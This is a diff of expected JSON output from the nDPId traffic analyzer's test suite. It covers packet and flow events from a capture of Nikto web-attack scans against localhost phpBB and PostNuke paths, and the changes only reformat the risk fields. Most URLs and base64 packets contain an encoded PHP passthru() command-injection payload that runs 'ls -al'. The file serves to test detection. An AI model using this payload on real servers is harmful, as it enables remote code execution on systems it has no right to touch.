 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"ts_msec":1576420277813,"pkt":"AAAAAAAAAAAAAAAACABFAAFt2OpAAEAGYp5\/AAABfwAAAccGH5BS6uHGYiCIs4AYAED\/YQAAAQEICp1m\/12dZv9dR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"ts_msec":1576420277814,"pkt":"AAAAAAAAAAAAAAAACABFAAFt1fZAAEAGZZJ\/AAABfwAAAccIH5Bl1OzaDJYmQ4AYAED\/YQAAAQEICp1m\/16dZv9eR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
+01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00881{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"ts_msec":1576420277816,"pkt":"AAAAAAAAAAAAAAAACABFAAFmyD5AAEAGc1F\/AAABfwAAAccKH5CvpPET10Ucz4AYAED\/WgAAAQEICp1m\/2CdZv9gR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"ts_msec":1576420277817,"pkt":"AAAAAAAAAAAAAAAACABFAAFvTQNAAEAG7oN\/AAABfwAAAccMH5C7inQwMMPyYoAYAED\/YwAAAQEICp1m\/2GdZv9hR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"ts_msec":1576420277819,"pkt":"AAAAAAAAAAAAAAAACABFAAF0lOFAAEAGpqB\/AAABfwAAAccOH5D5PK3yk85ZF4AYAED\/aAAAAQEICp1m\/2KdZv9iR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"ts_msec":1576420277821,"pkt":"AAAAAAAAAAAAAAAACABFAAFu9rlAAEAGRM5\/AAABfwAAAccQH5BepM+ZKyRDwoAYAED\/YgAAAQEICp1m\/2WdZv9lR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-01036{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
+01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"ts_msec":1576420277822,"pkt":"AAAAAAAAAAAAAAAACABFAAFs7qZAAEAGTON\/AAABfwAAAccSH5AvkdeM6hywhIAYAED\/YAAAAQEICp1m\/2adZv9mR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
